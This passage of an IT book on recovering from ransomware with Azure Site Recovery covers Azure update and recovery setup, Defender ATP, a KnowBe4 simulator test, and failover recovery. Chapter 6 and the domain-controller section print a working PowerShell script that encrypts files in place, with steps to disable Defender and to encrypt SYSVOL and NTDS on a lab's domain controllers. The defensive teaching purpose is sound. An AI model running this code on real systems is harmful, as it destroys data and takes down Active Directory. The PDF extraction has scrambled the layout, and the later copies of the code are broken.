6. Click on Updates and then

click on Centrally Manage
updates on all your
servers by using Azure
Update Management (Set
up now)
113
7. On the Setup Azure

Update Management tab,
Choose your Subscription.
8. Create a new Resource
Group
9. Choose a Region
10. Create a new Log
Analytics Workspace
11. Create a new Azure
Automation Accounts and
click Set Up
114
115
12. View the progress by

checking notification
details
13. Once completed you

should see a success
status message
116
14. Once setup is complete

click on Manage in Azure
15. You will see your server

show up in Azure Update
Management
16. Next click on Schule

Update Deployment
17. On Name type: Daily
Updates
117
18. Complete the deployment

settings and select
Management 01
118
19. Once complete you can

see that the updates are
managed by Azure
Updates
Configure Azure Site Recovery

An important part of our Ransomware defense strategy is having an update to date Disaster
Recovery Solution. In the event of a Ransomware attack, the only option might be recovering to
a DR Site like Azure.
as Administrator
119

accept the Security

Admin Credentials
5. Click on drtitan01
6. Click on Virtual Machines

and click on Help Protect
your VMs from disasters
by using Azure Site
Recovery (Set up Now)
120
7. ON the Set up host with

Azure Site Recovery
choose your subscription.
8. Select a Resource Group
9. Create a new Recovery
Services Vault and click
Set up ASR
121
10. Verify the progress
11. Verify the progress
12. On the inventory tab, you

can see the Status for
Disaster Recovery Change
once ready.
122
13. Configure Azure Site

Recovery protection for
FS01. Select FS01 click
More and click Protect
VM
123
14. On the Protect FS01 with

Azure Site Recovery,
window create a new
Storage Account called
asrdrtitanstorage
15. Click Protect VM
16.
124
Upgrade to Security Center Standard in Azure

To start seeing metric and use security center we will need to either start a trial or sign up for
Security Center Standard.
1. Open you Azure Portal

and browse to Security
Center, Getting Started,
Click on
asrransomwarelogs and
click Upgrade
2. Once Upgraded you will

see the checkmark on
Ugpraded
3.
125
126
Chapter 5 Windows Defender Advanced Threat Protection ATP
Chapter 5
Windows Defender Advanced

Threat Protection ATP
Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help
protect your Windows Servers. This tool gives the capabilities of Windows Defender that is
included with Windows Server 2019.
In this chapter, we will give a brief overview of some of the features. To start things off, you will
need to sign up for a trial here: https://www.microsoft.com/en-
us/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink
127
Onboarding a Server with Windows Defender ATP
1. Browse to
https://securitycenter.win
dows.com/dashboard
2. Log in with your Admin
Credentials
128
3. Click on the Settings

Wheel, and scroll down to
Machine Mangement
4. You will notice that there
are many different
deployment options from
local installation, Group
Policy, Configuration
Manager, etc.
5. Choose Local Script
6. Download the
Deployment Package to
the Target Server
Management 01
7. Open an Administrative
Command Prompt and
run
WindowsDefenderATPLoc
alOnboardingSCript.cmd
8. Wait approximately 5
minutes and check the
machines List in the Portal
129
Reviewing an Incident with Windows Defender Advanced Threat

Protection
1. Browse to
https://securitycenter.win
dows.com/dashboard
2. Log in with your Admin
Credentials
3. Here we can see that our

machine Management01
has had Occamy Malware
detected. We will look at
this attack later in the
book.
130
4. If we scroll down on the

machine, we can see a
timeline of the infection
5. We can also drill into the

alert giving more
information about the
incident
131
6. We can also see an

incident Graph
7. We can also drill into the

live investigation that
took place for this
incident
132
Chapter 6 Simulating a Ransomware Attack
Chapter 6
Simulating a Ransomware
Attack
KnowBe4 Ransomware Simulator on Windows Server 2019
RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario
and show you if a workstation is vulnerable.
133
1. In Order to initially test

the Ransomware
Simulator we are going to
have to turn off Windows
Defender Protection on
our Windows Server 2019
machine Management01.
If you don’t do this the
installation of the
Ransomware Simulator
will fail.
2. Download the Knowbe4

from
https://www.knowbe4.co
m/ransomware-simulator
3. Run SimulatorSetup.exe
and click install
134
4. Once Setup has

completed close the
installation window.
5.
6. The files for the

installation are located in
c:\users\administrator.ms
smoa\appdata\
7. This is where the temp
files are stored for testing
during the Ransomware
tests
135
8. On the KnowBe4
window click launch
136
9. On the KnowBe4 Ransim

window click Launch
10. We will launch the attack

initially with Defender
Disabled and see what
happens
11. You will see a test folder
get created you don’t see
this when Windows
Defender is enabled
137
12. You will be able to see the

files being encrypted real
time in here.
13. We can see that 14/14

scenarios succeeded with
Windows Defender Off
138
14. Now let us turn Windows

Defender Protection Back
on
15. Re-Run the tests this time

with protection enabled
16. You can see right away
Windows Defender found
a problem
139
17. We can see the the

Trojan.Win32/Ocamy.C
was found
18. One of the things that I

noticed when Defender
was enabled was that the
Ransomware Tool was
very slow and
unresponsive.
140
19. And we can see that after

a long period of time
none of these attacks
succeeded directly on the
server
Enabling Ransomware Protection on Windows Server 2019
A new Feature with Windows Server 2019 is Ransomware Protection. In the following steps, we
will re-run the tests with Ransomware Simulator Ransim and see the output.
141
1. Open Windows Security

and clock on Ransomware
Protection
2. Click on manage
Ransomware Protection
3. Turn On Controlled Folder

access
142
4. Click on Protected Folders

to see what folders are
protected by default
5. Click on Add Protected

Folder and Add
C:\Users\Administrator.M
MSMOA\appdata\local\R
nSimulator
143
6. Re-Run the RanSim tests
7. Right away a new popup

showed that
Unauthorized Changes
Blocked collector.exe
from making changes
8. Moreover, we can see

that after a longperiod
none of these attacks
succeeded directly on the
server
144
Executing a Ransomware Attack with PowerShell
The code below is only to be used for testing purposes. DO Not run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
Add-Type -AssemblyName System.Windows.Forms

$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath
#global variables
$csv = "C:\windows\temp\drives.csv"
#Define the cert to use for encryption

#Create your own cert with this command;
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname
ransomware.mmsmoa.local
$Cert = $(Get-ChildItem
Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A)
$Cert
#discover the other folders beneath the selectedpath

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and
( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue
$FilestoEncrypt
Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C
ertificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography"
) }
Catch { Write-Error "Could not load required assembly."; Return }
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
145
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)",
[System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open)
}
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination
$FilesToEncrypt.FullName -Force
}
#Encrypt each file

foreach ($file in $FilesToEncrypt)
{
Write-Host "Encrypting $file"
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}
Exit
146
1. Open PowerShell ISE and Add-Type -AssemblyName System.Windows.Forms

$FolderBrowser = New-Object
run as Administrator System.Windows.Forms.FolderBrowserDialog
2. Run this code to select $FolderBrowser.SelectedPath
the target folder. We will
use one of the sample
RanSIm Folders.
3. C:\Users\Administrator.M
MSMOA\appdata\local\R
nSimulator\TestFolder\Te
sts\1-Tests
4. Select the folder and click

ok
147
5. Create a new Self Signed New-SelfSignedCertificate -certstorelocation

cert:\localmachine\my -dnsname
Certificate ransomware.mmsmoa.local
6. Copy the thumbprint to
the clipboard
7. Run the following to put $Cert = $(Get-ChildItem

Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C
the Certificate into the 89DA4DBCD)
$Cert
$Cert Variable
8. Then Grab the files from $FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object {
the folder !($_.PSIsContainer -eq $true) } | % {$_.FullName} -
ErrorAction SilentlyContinue
$FilestoEncrypt
9. Run the Encrypt-File Function Encrypt-File

{
Function
Param([Parameter(mandatory=$true)][System.IO.FileInfo
]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptogr
aphy.X509Certificates.X509Certificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("Sy
stem.Security.Cryptography") }
Catch { Write-Error "Could not load required
assembly."; Return }
148
$AesProvider.Mode =
[System.Security.Cryptography.CipherMode]::CBC
System.Security.Cryptography.RSAPKCS1KeyExchangeForma
tter($Cert.PublicKey.Key)
$KeyFormatter.CreateKeyExchange($AesProvider.Key,
$AesProvider.GetType())
[Int]$LKey =
$KeyEncrypted.Length
$LenKey =
[System.BitConverter]::GetBytes($LKey)
[Int]$LIV =
$AesProvider.IV.Length
$LenIV =
[System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam
e)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file
for writing."; Return }
$FileStreamWriter.Write($KeyEncrypted, 0,
$LKey)
$Transform =
$AesProvider.CreateEncryptor()
System.Security.Cryptography.CryptoStream($FileStream
Writer, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Writ
e)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes =
$AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[]
$BlockSizeBytes
[Int]$BytesRead = 0
System.IO.FileStream("$($FilesToEncrypt.FullName)",
[System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file
for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0,
$BlockSizeBytes)
$Offset += $Count
149
}
copy-Item -Path $($env:temp+$FilesToEncrypt.Name)
-Destination $FilesToEncrypt.FullName -Force
}
10. Try Encrypting your files foreach ($file in $FilesToEncrypt)

{
Encrypt-File $file $Cert -ErrorAction
SilentlyContinue
}
150
11. The Ransomware attack

was successful and
bypassed Windows
Defender, ATP, and
Ransomware Protection
12. I renamed one of the files

and took the .exe off the
end it is indeed
encrypted.
151
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Chapter 7
Recovering from Ransomware

using Azure Site Recovery
Notes from the Field

Why Airgapped Replicas are the only choice
So what is air gapped backup anyways? Here is what Wikipedia has to say:
An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.
In lay man’s terms, it means that you must keep a copy of you Backups and replicas offline.
Why Planned Failover is no longer an option

Planned Failover is the normal process of failing over to replica recovery points at a different
location. What the planned failover process does is the following:
1. Once kicked off it takes a final sync of the source machines
2. Then once replication completes it turns off the Source Virtual Machine
152
3. At this point, it takes one final sync to capture the remaining changes. This can only be done
once the Virtual is off. Think of a SQL Server or Exchange Server that were processing
transactions during the 1st sync. The system cannot guarantee all of the records are there
until the Virtual Machine is off. That is why it shuts down the source machine to complete
the final delta sync.
4. Once the Sync is completed the Virtual Machine is powered on in your Microsoft Azure
Tenant.
Why will this not work in a Ransomware Situation? Because if the source machine was infected
and the files were encrypted you just too the encrypted files up to Azure and turned on the
Virtual Machine.
Failover Now is the only Option

With the Planned Failover process not viable for us the only option is to use the Failover Now or
Failover option. This will allow us to select a point in time to simply power on the Virtual
Machine.
1. The steps to perform Failover Now are easier and faster than a planned failover. First, you
choose the Virtual Machine from the Azure Recovery Vault.
2. Next, you select the Failover button
3. Choose the restore point
4. Turn on the VM
The total amount of time to turn on an air gapped replica virtual machine is minutes.
Watch you Six (Clock)

When dealing with a ransomware incident, nobody is going to have your back. You do not have
the luxury of time when it comes to a ransomware attack. If you had configured a maximum of
30 restore points in Azure the clock is ticking. If the source Virtual Machine is still on your Azure
153
Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you out run
the number of restore points and all you have is infected or cryptoed files, then Azure Site
Recovery was pointless.
Do not connect your Azure Site Recovery Virtual Machines to a

live Site-to-Site VPN
There is a big difference between traditional Disaster Recovery protection and the level of
protection that is required to survive a ransomware attack. Think of it this way if you run a live
Domain Controller in the cloud like many of us do. What happens when we have a live incident,
and the source on-prem side is compromised. Do you think that Azure Virtual Machine running
as a domain controller is safe?
Earlier in the book, we showed you what an admin level ransomware attack looked like for core
infrastructure roles like Domain Controllers. What this means for you is that you must keep
tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud.
Once you have safely recovered to a previous recovery point and cleaned up the on-prem side at
that point, you will be able to setup a Site-to-Site VPN to give users access.
When can I get back into my data?

Oh, do I love the phone calls of people screaming at me wondering when they will be able to get
their data back? What they don’t understand is they are lucky that we have any data at all. If
you didn’t have an air-gapped backup and dr solution you could be looking at something like this:
Dear CEO,
I think it is the time that we notify the public of the breach that has occurred on 04/13/2019.
None of our services will be viable for the next foreseeable future. You should look at issuing a
public statement and having our teams contact our business partners. Those million dollar
shipment of supplies will not be arriving on time. Blah Blah
154
If you think that this situation doesn’t happen, you are dead wrong. If you ask a room of IT
Professionals how many have been impacted by some type of Ransomware attack in the past 3
years most of them would put their hands up.
So, the short answer to the question “When can I get my data back is?” is as soon as we can.
Trust me the on this one point my friends that if you have an option of nothing or a recovery
point that is 24 or 48 hours old. The business will be extremely thankful that they have
something to keep going.
The pain staking process of rekeying data in a Ransomware Attack is something that you won’t
be able to overcome.
Our first and primary concern is getting them back at all.
Ok, so I didn’t listen and lost everything now what?

If you didn’t have an air-gapped solution and you lost everything now what. Well, it because of
one giant salvage operation. Starting here:
1. Rebuilding Core Infrastructure Roles
a. Active Directory
b. DNS
c. DHCP
2. Rebuilding all the Workstations
3. Rebuild SQL, Exchange, SharePoint
4. Praying our backups to go back far enough
You are talking about weeks if not months of downtime for some of these services if not all of
them.
155
5. The steps to perform Failover Now are easier and faster than a planned failover. First, you
choose the Virtual Machine from the Azure Recovery Vault.
6. Next, you select the Failover button
7. Choose the restore point
8. Turn on the VM
The total amount of time to turn on an air gapped replica virtual machine is minutes.
Don’t forget to tune your Replication Policy

Your Replication Policy will determine how many recovery points you have available. What does
this mean to you the IT PRO our Cloud Admin? It means that this is the amount of time you
have to make a decision when a Ransomware attack occurs. If you only have 7 days worth of
recovery points in the cloud, it means you have maximum 7 days to make a decision. You
cannot take the weekend off if you get a ransomware attack. You must act immediately and
make a decision. This nice part about being able to recover in the cloud is you can actually
recover offline and not directly connect back to the core infrastructure.
Testing Failover can be a quick Ransomware Fix

Using the Test Failover option can be a very quick ransomware fix for your organization. With
this option, you can quickly create a portable environment to either get files back or to check the
viability of your Azure Site Recovery Points. We often recommend to our clients that they
156
should be testing their Recovery Points Quarterly. This is safe to do in an offline environment
and doesn’t take that long to complete
Reset Settings for your Azure Site Recovery Hyper-V Host

Sometimes it can be difficult to add hosts from Windows Admin Center into Asure Site Recovery.
The following script will help take care of error messages like this.
157
158
To resolve the issue I had to run a Reset Script on the host to wipe all the settings.
pushd .
try
{
$windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal=new-object
System.Security.Principal.WindowsPrincipal($windowsIdentity)
$administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrat
or
$isAdmin=$principal.IsInRole($administrators)
if (!$isAdmin)
{
"Please run the script as an administrator in elevated
mode."
$choice = Read-Host
return;
}
$error.Clear()
"This script will remove the old Azure Site Recovery Provider
related properties. Do you want to continue (Y/N) ?"
$choice = Read-Host
if (!($choice -eq 'Y' -or $choice -eq 'y'))

{
"Stopping cleanup."
return;
}
$serviceName = "dra"
$service = Get-Service -Name $serviceName
159
if ($service.Status -eq "Running")

{
"Stopping the Azure Site Recovery service..."
net stop $serviceName
}
$asrHivePath = "HKLM:\SOFTWARE\Microsoft\Azure Site Recovery"

$registrationPath = $asrHivePath + '\Registration'
$proxySettingsPath = $asrHivePath + '\ProxySettings'
$draIdvalue = 'DraID'
$idMgmtCloudContainerId='IdMgmtCloudContainerId'
if (Test-Path $asrHivePath)
{
if (Test-Path $registrationPath)
{
"Removing registration related registry keys."
Remove-Item -Recurse -Path $registrationPath
}
if (Test-Path $proxySettingsPath)
{
"Removing proxy settings"
Remove-Item -Recurse -Path $proxySettingsPath
}
$regNode = Get-ItemProperty -Path $asrHivePath

if($regNode.DraID -ne $null)
{
"Removing DraId"
Remove-ItemProperty -Path $asrHivePath -Name
$draIdValue
}
if($regNode.IdMgmtCloudContainerId -ne $null)
{
"Removing IdMgmtCloudContainerId"
160
Remove-ItemProperty -Path $asrHivePath -Name

$idMgmtCloudContainerId
}
"Registry keys removed."
}
# First retrieve all the certificates to be deleted

$ASRcerts = Get-ChildItem -Path cert:\localmachine\my | where-
object {$_.friendlyname.startswith('ASR_SRSAUTH_CERT_KEY_CONTAINER') -or
$_.friendlyname.startswith('ASR_HYPER_V_HOST_CERT_KEY_CONTAINER')}
# Open a cert store object
$store = New-Object
System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine"
)
$store.Open('ReadWrite')
# Delete the certs
"Removing all related certificates"
foreach ($cert in $ASRcerts)
{
$store.Remove($cert)
}
}catch
{
[system.exception]
Write-Host "Error occurred" -ForegroundColor "Red"
$error[0]
Write-Host "FAILED" -ForegroundColor "Red"
}
popd
161
Enable Diagnostic Logging for Azure Site Recovery

To enable debug logging for the ASR Provider, use the following steps:
Open an elevated PowerShell Window and then run the following commands to create your
trace definition:
logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf

01:00:00 -nb 10 250 -bs 16 -ow -y
logman update ASRDebug -p "Microsoft-Azure Site Recovery-

Provider" 0x8000000000000000 0x5
logman update ASRDebug -p "MicrosoftAzureRecoveryServices"

0xC000000000000000 0x5
Note: The default location specified above is C:\temp. You may safely change this value if
needed. The folder will be created if it does not exist.
Start the trace by typing the following command in the elevated Windows PowerShell window:
logman start ASRDebug
Reproduce your issue.
As soon as you reproduce your issue, stop the trace by typing the following command:
logman stop ASRDebug
Convert the trace to readable text, type

netsh trace convert <filename>
Collect debug logs from the folder <installation folder>\Temp. The default location will be
C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.
162
Zero Day time to Failover
Assuming an Admin Level breach Failing over 100 % to Azure

In this scenario, we are going to look at an attack that takes place directly on your Domain
Controllers. This is the worst case for a Ransomware type attack because the attacker is not
looking for an immediate payment they have hacked into your system and are directly executing
the attack.
Note: This scenario takes place based on real-life events that took place 2 years ago. The client
in question had their Admin credentials compromised from an online cloud backup provider.
The attackers gained access to the backups and were able to crack the NTDS. Dit (Active
Directory Database) offline. Then at their leisure could they come in and out. They executed
this sophisticated attack on the customer’s busiest day of the year.
To showcase an attack like this, we are going to use PowerShell with Administrative privileges.
You will notice how none of Windows Defenders protection polices catch this.
We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain
controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS
folder on each domain controller.
All of these steps were performed in a lab environment. Please do not try any of these steps in
production.
Executing a PowerShell based Ransomware Attack on Domain

Controllers.
163
The code below is to only be used for testing purposes. DO Not run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
Add-Type -AssemblyName System.Windows.Forms

$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
$FolderBrowser.SelectedPath
#global variables
$csv = "C:\windows\temp\drives.csv"
#Define the cert to use for encryption

#Create your own cert with this command;
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname
ransomware.mmsmoa.local
$Cert = $(Get-ChildItem
Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A)
$Cert
#discover the other folders beneath the selectedpath

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and
( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue
$FilestoEncrypt
Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C
ertificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography"
) }
Catch { Write-Error "Could not load required assembly."; Return }
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
$KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
164
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)",
[System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$Transform = $AesProvider.CreateEncryptor()
System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open)
}
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
}
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination
$FilesToEncrypt.FullName -Force
}
#Encrypt each file

foreach ($file in $FilesToEncrypt)
{
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}
Exit
Encrypting the Sysvol Folder
165
1. Logon to DC01 as
Administrator

3. Browse to $FolderBrowser.SelectedPath
C:\windows\Sysvol and
click ok

the clipboard
166

$Cert
$Cert Variable
$FilestoEncrypt

{
Function
]$FilesToEncrypt,
Try {
$AesProvider.Mode =
[Int]$LKey =
$LenKey =
167
[Int]$LIV =
$LenIV =
$FileStreamWriter
$LKey)
$Transform =
Writer, $Transform,
e)
[Int]$Count = 0
[Int]$Offset = 0
$BlockSizeBytes
[Int]$BytesRead = 0
Do
{
$BlockSizeBytes)
$Offset += $Count
}
}

{
SilentlyContinue
168
10. Verify that the files are

indeed encrypted
11. Test GPUpdate from a

client for interesting
results. Here is before.
169
12. Here is after the Sysvol

was Encrypted
13. We had a scenario like
this at one client and
didn’t have a good backup
of the Domain Controller.
We we able to use
DCGPOFix.exe to
overwrite the default
domain and default
domain controller policy
to start over.
14. Next, we replicated Active

Directory to push our
encrypted files out to all
domain controllers.
15. Verified on DC02 that the

Sysvol was encrypted
170
Taking Down Production Killing Domain Controllers with

Ransomware
In this scenario, we are going to target the Active Directory Database files which are by default
located in c:\Windows\NTDS. We will use the steps performed below to take down all of the
Domain Controllers in our lab leaving us no choice but to restore from backup or failover to a DR
site like Azure.
Encrypting the Active Directory Database
1. Logon to DC01 as
Administrator

3. Browse to $FolderBrowser.SelectedPath
C:\windows\NTDS and
click ok
171

the clipboard

$Cert
$Cert Variable
172
$FilestoEncrypt

{
Function
]$FilesToEncrypt,
Try {
$AesProvider.Mode =
[Int]$LKey =
$LenKey =
[Int]$LIV =
$LenIV =
$FileStreamWriter
173
$LKey)
$Transform =
Writer, $Transform,
e)
[Int]$Count = 0
[Int]$Offset = 0
$BlockSizeBytes
[Int]$BytesRead = 0
Do
{
$BlockSizeBytes)
$Offset += $Count
}
}

{
SilentlyContinue
}
174
10. Let’s see if it worked. Try

opening Active Directory
users and computers. It
appears to be still
working.
11. Stop the Active Directory

Domain Services Service
175
12. Try Encrypting the

C:\Windows\NTDS folder
again
13. Now try to restart the

Active Directory Domain
Services Service.
14. We can see that the

service won’t start with a
weird error 0xc0000001:
0xc0000001
15. We can see that Active

Directory Users and
computer is not
operational
176
16. Repeat the steps on DC02
17. Both DC’s are dead we

should try rebooting right.
Sure why not.
18. We now have all of our

DC’s in a non-bootable
state with Blue Screens
19. The attack has succeeded,

and all domain controllers
are dead.
177
Survival Mode Recovering to Azure

Remember we talked about a narrow window to recover to Azure. If you outrun your recovery
points all of your data in the cloud will be encrypted as well. What is required at this point at a
minimum is to plan to proceed and execute quickly with a cloud recovery strategy?
As you can see from the screenshot above that our replication is still running to Azure. Azure
Site Recovery doesn’t understand that anything bad has happened. Soon enough all of our DC’s
in our Recovery Vault will also have rolling blue screens.
178
Tick Tock time to make a decision – We are Recovering to Azure

Ok, so the decision has been made we have been asked to proceed with Azure-based recovery.
We had created a Recovery Plan in Azure Site Recovery, but Recovery Plans can only be used to
Failover to the last Recovery Point.
This will not work for us in this situation.
179
Performing the Double Swing Recovery

The double swing migration method is extremely useful in situations like this. We will first fail
the Virtual Machines over to our Azure Tenant. Validate that everything is ok and then bring
them back on-prem to save the day.
1. Logon to your Azure

Tenant and browse to
your recovery vault.
2. Click on replicated items
3. Click on DC01 and click
Failover
4. After we have validated

the Virtual Machines we
need to Commit then to
Azure
5. Now we will use a

Planned Failover to move
the Virtual machines back
on-prem.
180
6. On the planned failover

window validate the
options and click ok.
181
7. Repeat the steps on DC02

and wait approximately
45 minutes. In the mean
time, we will have a look
at a few things.
8. You can see the status of

the Planned Failover
9. Viewing the Job status in

Hyper-V Manager
182
10. You can view the progress

of the replication by
checking cbengine.exe in
Resource Monitor.
11. We can also enable debug logman create trace ASRDebug -v mmddhhmm -o
C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -
logging to see what is y
logman update ASRDebug -p "Microsoft-Azure Site
happening. Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p
"MicrosoftAzureRecoveryServices" 0xC000000000000000
0x5
logman start ASRDebug
logman stop ASRDebug
netsh trace convert C:\temp\asr_04132122.etl
183
12. After a while, you can see

the planned failover
succeeded we have to hit
Complete Failover
13. Hit Complete Failover
184
14. You can view the status of

the replication in Hyper-V
Manager
15. You can see the progress

in Azure with the Failback
16. We can see the Domain

Controllers back online
now.
17. The real test is to see if

Active Directory is
working now.
185
18. We can also see that our

Sysvol is now fixed.
186
187
Chapter 8 Disaster Recovery items left forgotten
Chapter 8
Disaster Recovery items left

forgotten
188
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
Chapter 9
Join us at MVPDays and meet

great MVP’s like this in
person
If you liked their book, you would love to hear them in person.
Live Presentations
Dave frequently speaks at Microsoft conferences around North America, such as TechEd,
VeeamOn, TechDays, and MVPDays Community Roadshow.
Cristal runs the MVPDays Community Roadshow.
You can find additional information on the following blog:
www.checkyourlogs.net
www.mvpdays.com
Video Training
For video-based training, see the following site:
www.mvpdays.com
189
Live Instructor-led Classes

Dave has been a Microsoft Certified Trainer (MCT) for more than 15 years and presents
scheduled instructor-led classes in the US and Canada. For current dates and locations, see the
following sites:
 www.truesec.com
 www.checkyourlogs.net
Consulting Services
Dave and Cristal have worked with some of the largest companies in the world and had a wealth
of experience and expertise. Customer engagements are typically between two weeks and six
months.
190
191

Dave Kawula - Emile Cabot - Cary Sun - Cristal Kawula - John O'Neill Sr. - Surviving A Ransomware Attack With Azure Site Recovery

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Dave Kawula - Emile Cabot - Cary Sun - Cristal Kawula - John O'Neill Sr. - Surviving A Ransomware Attack With Azure Site Recovery

Uploaded by

Copyright:

Available Formats

Surviving a Ransomware

Attack with Azure Site

Copyright © 2019 by MVPDays Publishing

Warning and Disclaimer

About the Authors

Cristal Kawula – Microsoft MVP

Emile Cabot – Microsoft MVP

Cary Sun – Microsoft MVP

John O’Neill Sr – Re-Connect Microsoft MVP

Foreword by .................................................................................................................. iii

Acknowledgments ........................................................................................................ iii

About the Authors ........................................................................................................ iv

MVPDays Online .......................................................................................................... 14

Setting up your Azure Subscription from Scratch .................................................... 17

